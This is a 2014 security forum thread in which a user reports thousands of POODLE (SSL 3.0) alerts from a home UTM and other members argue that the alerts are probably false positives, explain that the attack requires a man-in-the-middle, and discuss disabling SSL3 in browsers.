Poodle attacks on Chrome based browsers.

Discussion in 'other software & services' started by Mayahana, Nov 10, 2014.

  1. Mayahana

    Mayahana Banned

    Joined:
    Sep 13, 2014
    Posts:
    2,220
    I came home today and noticed over 2200 Poodle attacks on my network - my UTM got pushed an IPS patch automatically to stop Poodle attacks, but what about people without UTM's? Since everyone in the home uses Chrome (fully updated) I am going to assume these were directed at Chrome. See attached screenshot. The one with 2259 attacks is Poodle. CVE-2014-3566

    Why hasn't Chrome patched this yet? I noticed Firefox apparently won't be patching it out until the end of November. But clearly based on my UTM's alerts today, this issue is more critical than these browser firms are taking it.

    Apparently you can command like Poodle (SSL3) out with Chrome;

    https://productforums.google.com/forum/#!topic/chrome/dpiPu9B1cBI
     

    Attached Files:

  2. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,066
    Maybe there is no attack and your UTM just blocks all SSL3 connections?
     
  3. Yuki2718

    Yuki2718 Registered Member

    Joined:
    Aug 15, 2014
    Posts:
    1,257
    I second Simplicity.
    What do you mean by 'patch'?
    POODLE is a vulnerability in the protocol of SSL3.0(with CBC encryption) and there can't be direct patch.
    What browser vendor can is at most to minimize the risk of 'downgrade' for TLS protocol, and Google already did it by support of TLS_FALLBACK_SCSV.

    I think so far POODLE is not widely used in real world, and it will more likely be a kind of FPs. Possibly, your UTM just detected downgrade request from your machine which also can occur in usual https connection, or maybe more complicated FPs...

    Note POODLE is not remotely exploitable.
    Attacker have to make your browser to send https request hundreds of times with slightly modified header for each request, it is possible only when he already intruded by e.g. code execution vulnerability.
    Also attacker have to intervene connection btwn your browser and server, but it is usually done in public wifi.

    Considering you have quite robust layered protection and in the home network, it's unlikely they are real attack.
     
  4. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,066
    I agree. It would be nice if Google offered protocol selection in advanced settings (similar as IE) or through chrome://flags.
     
  5. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    17,046
    There is an add on for Firefox that stops poodle attacks, so Firefox is covered.
     
  6. Mayahana

    Mayahana Banned

    Joined:
    Sep 13, 2014
    Posts:
    2,220
    Everyone has 'some' method.. IE you change a setting. Chrome you need to add command line modifier to icon. Firefox you can edit a config or addon.

    It's serious, I am unsure why none of these companies have patched for it?
     
  7. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,066
    They can't "patch" SSL3 protocol. They can only disable it's usage...
     
  8. Mayahana

    Mayahana Banned

    Joined:
    Sep 13, 2014
    Posts:
    2,220
    I'm aware of how encryption works, patch term is used liberally here - meaning release versions defaulting it to OFF with an option to turn it ON. It's a pretty serious issue, and their actions towards it seem slow. Disabling the fallback below TLS solves it fairly quickly, but anyone(the masses) not doing the tweaks is vulnerable for a bit longer than I feel comfortable with.
     
  9. gorhill

    gorhill Developer

    Joined:
    Nov 12, 2013
    Posts:
    747
    Location:
    Canada
    Could this be linked to your use of Adguard? With malware/phishing turned on, Adguard will send the hostname of sites you visit the first time they are encountered (reset after a timeout expires) to "sb.adtidy.org", typically in the form "https://sb.adtidy.org/safebrowsing-lookup-domain.html?domain=www.google.ca&ip=173.194.43.111"

    If you check "sb.adtidy.org" with Qualys SSL Labs, you get "This server uses SSL 3, with POODLE mitigated"
     
  10. Mayahana

    Mayahana Banned

    Joined:
    Sep 13, 2014
    Posts:
    2,220
    Possibly. But enforcing TLS, and dropping off SSL3 fixed it. But 2200 would be a little lite if Adguard was doing it given the traffic at home.
     
  11. Kirk Reynolds

    Kirk Reynolds Registered Member

    Joined:
    May 8, 2011
    Posts:
    224
  12. Mayahana

    Mayahana Banned

    Joined:
    Sep 13, 2014
    Posts:
    2,220
    Interesting link. My worry is people without UTM's were essentially left wide open to this vulnerability, right? I know ZyXEL and Fortinet patched the vulnerability at the UTM level a couple of weeks ago with IPS signature updates. But Joe Smoe home guy may have had compromises? Considering I've now blocked close to 5,000 Poodle exploits this week so far, it makes me wonder.
     
  13. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,066
    Attacker still has to launch MITM attack to exploit this vulnerability, so I don't think regular user should worry too much. Maybe using open Wifi is not very secure but using home network should be relatively safe. I also doubt that you blocked that many exploits. Except if somebody hacked your cable between your home and your ISP. It was probably 5000 SSL3 dropped connections. But that doesn't mean there were any exploits...
     
    Last edited: Nov 11, 2014
  14. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,066
    More info: https://www.us-cert.gov/ncas/alerts/TA14-290A

     
  15. Mayahana

    Mayahana Banned

    Joined:
    Sep 13, 2014
    Posts:
    2,220
    My home network routinely comes under attack, state sponsored or otherwise. Even some Quantum injections from what we have found, and have been told. I assume a combination of factors result in fairly aggressive surveillance of myself/my network/systems, to which I DO take very nearly extreme precautions to avoid compromises. Not many folks drop double Layer-7 UTM's on their networks.. Anyway;

    1) Past Military, Defense Contractor, etc.
    2) Past work with Russian firms. :isay:
    3) Current IT work with high-value-targets (CEOs, Presidents, some famous folks)
    4) Past IT work securing privacy for some well connected folks.

    Ironically I use Russian gear to maintain network integrity at the front end, and US gear on the backend. I've had engineers from some AV companies, ZyXEL, and others on watching in realtime the pretty intense intrusion activity. Hopefully my stacked UTM's will take care of the worst stuff, and if anything sneaks in it has to deal with more layers, and encrypted personal data. Right now the biggest issue are the quantum injections. My ISP won't fess up to it, and passes the buck, but admits it is happening. For every HTTP call to keyworded pages we get 1-3 Fraudloader packets injected 'fishing' for holes. I suppose since the Russian gear is snagging them I am not too worried, but it's pretty annoying because this is at the backbone or ISP level. No guarantee switching ISP's will fix it.

    44 hour UTM statistics on my HOME network; (incoming from WAN only)

    16,600 Viruses Intercepted
    12,100 Packets Rejected/Dropped
    11,300 Intrusions Intercepted
     
  16. ArchiveX

    ArchiveX Registered Member

    Joined:
    Apr 7, 2014
    Posts:
    1,016
Loading...